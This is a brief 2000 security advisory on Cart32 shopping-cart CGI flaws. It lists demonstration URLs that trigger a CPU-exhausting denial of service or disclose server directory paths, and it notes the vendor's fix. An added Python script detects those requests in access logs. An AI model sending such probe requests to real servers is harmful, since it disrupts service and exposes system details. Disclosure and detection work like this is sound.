Reported November 9, 2000 by Xato Network Security
DESCRIPTION

DEMONSTRATION

The denial of service is accomplished by entering the following URL:

http://www.example.com/cgi-bin/c32web.exe/ShowProgress

This will cause CPU usage to jump to 100%.

The second issue, information leakage displaying full physical paths of directories, can be accomplished with the following URLs:

http://www.example.com/cgi-bin/cart32.exe/error
http://www.example.com/cgi-bin/c32web.exe/ShowAdminDir
http://www.example.com/cgi-bin/c32web.exe/CheckError?error=53

VENDOR RESPONSE

The Cart 32 team at McMurtrey/Whitaker & Associates has addressed these issues in the latest version 3.5a and has recommended that users read the knowledge base articles provided on their web site.

http://www.cart32.com

CREDIT
Cart 32 Vulnerable to Information Leakage and DoS Attack
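
To check whether a server has already received the requests listed in the demonstration, the following added example (not part of the original advisory or the vendor's code) scans access-log lines for those four paths and labels each hit by issue. It assumes Common Log Format; the sample log lines, client addresses and the benign `MyStore-AddItem` request are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Path suffixes taken from the advisory's demonstration URLs, mapped to the issue each triggers.
PROBES = {
    "/c32web.exe/showprogress": "dos",
    "/cart32.exe/error": "path-disclosure",
    "/c32web.exe/showadmindir": "path-disclosure",
    "/c32web.exe/checkerror": "path-disclosure",
}

# Assumption: Common Log Format, i.e. client first, request line in double quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the issue a request target maps to, or None if it is not listed."""
    # Drop the query string, decode percent-escapes and fold case so that
    # trivially varied spellings of the same path still match (conservative).
    path = unquote(urlsplit(target).path).lower().rstrip("/")
    for suffix, issue in PROBES.items():
        if path.endswith(suffix):
            return issue
    return None

def scan(lines):
    """Yield (client, issue, target) for each log line that hits a listed endpoint."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        issue = classify(m.group(2))
        if issue:
            yield m.group(1), issue, m.group(2)

# Constructed sample log lines (not from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Nov/2000:10:00:01 +0000] "GET /cgi-bin/c32web.exe/ShowProgress HTTP/1.0" 200 0',
    '192.0.2.10 - - [09/Nov/2000:10:00:05 +0000] "GET /CGI-BIN/C32WEB.EXE/CheckError?error=53 HTTP/1.0" 200 412',
    '198.51.100.7 - - [09/Nov/2000:10:01:00 +0000] "GET /cgi-bin/cart32.exe/%65rror HTTP/1.0" 200 300',
    '198.51.100.7 - - [09/Nov/2000:10:02:00 +0000] "GET /cgi-bin/cart32.exe/MyStore-AddItem HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for client, issue, target in scan(SAMPLE_LOG):
        print(f"{client}\t{issue}\t{target}")
```

Hits on a server already running version 3.5a are still worth reviewing, since they show who was probing for the older behavior.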